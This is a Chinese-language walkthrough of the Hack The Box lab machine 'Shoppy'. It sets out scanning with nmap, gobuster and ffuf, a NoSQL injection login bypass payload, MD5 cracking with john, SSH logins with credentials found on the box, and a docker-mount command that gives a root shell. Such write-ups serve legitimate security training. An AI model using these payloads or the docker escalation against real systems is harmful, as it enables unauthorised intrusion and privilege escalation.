ip:10.10.11.180
信息收集#
端口開放情況#
利用nmap進行端口掃描
nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.180
發現的端口:22,80,9093
80 跳轉到http://shoppy.htb
修改 hosts 文件,添加解析
域名情況#
既然有域名,就看看虛擬主機掃描能掃出什麼東西。
gobuster vhost -u shoppy.htb -w /Users/grayash/pentesting/web-basic/p12-字典收集/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 50
找到一個虛擬主機子域
mattermost.shoppy.htb
將mattermost.shoppy.htb添加到 hosts 文件中解析。
瀏覽器訪問後,界面如下:
利用ffuf對 shoppy.htb 進行敏感目錄及文件遍歷。
.\ffuf.exe -w .\fuzz1.txt -u http://shoppy.htb/FUZZ
簡單測試了下,這個登錄框無 POST 鏈接。
當輸入 admin' or '1'='1 程序會無響應,輸入 admin' || '1=1 可以繞過後臺登錄,這個語句是 Nosql 的語句,所以這是一個 [[Nosql 注入]] 登錄繞過。
在搜索框中輸入同樣的 payload:admin' || '1=1
查看 json 文件,內容如下,包括了賬號密碼,密碼是 md5 加密了。
利用 [[john]] 破解 hash
john --wordlist=rockyou.txt --format=Raw-MD5 passwd.txt
remembermethisway
利用爆破出的密碼登錄 mattermost.shoppy.htb
賬號密碼為:
josh:remembermethisway
mattermost.shoppy.htb 網站是一個聊天程序,後臺建立了很多個頻道,在一個頻道中找到了賬號密碼,通過分析應該是 10.10.11.180 服務器的密碼,嘗試 ssh 登錄。
username: jaeger
password: Sh0ppyBest@pp!
找到第一個 flag,user.txt。
通過 sudo -l 可以查看當前用戶可以以 root 身份運行的程序。
/home/deploy/password-manager
Welcome to Josh password manager!Please enter your master password: SampleAccess granted! Here is creds !cat /home/deploy/creds.txtAccess denied! This incident will be reported !
SampleAccess granted! 所以 Sample 是主密碼,通過這個程序就可以看到主密碼。
就找到了 deploy 的密碼。
username: deploy
password: Deploying@pp!
同樣的方式,ssh 登錄 deploy 賬號。
權限提升#
通過頻道的聊天記錄可以知道,服務器是 docker 部署的。
通過https://gtfobins.github.io/gtfobins/docker/ 網站找到 docker 權限提升的 payload,通過 docker 可以獲取一個交互式 shell。
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
運行後就是 root 權限。
獲取 /root 目錄下的 flag。
知識點#
- 信息收集能力
- 虛擬主機、md5 密碼破解的能力
- 權限提升能力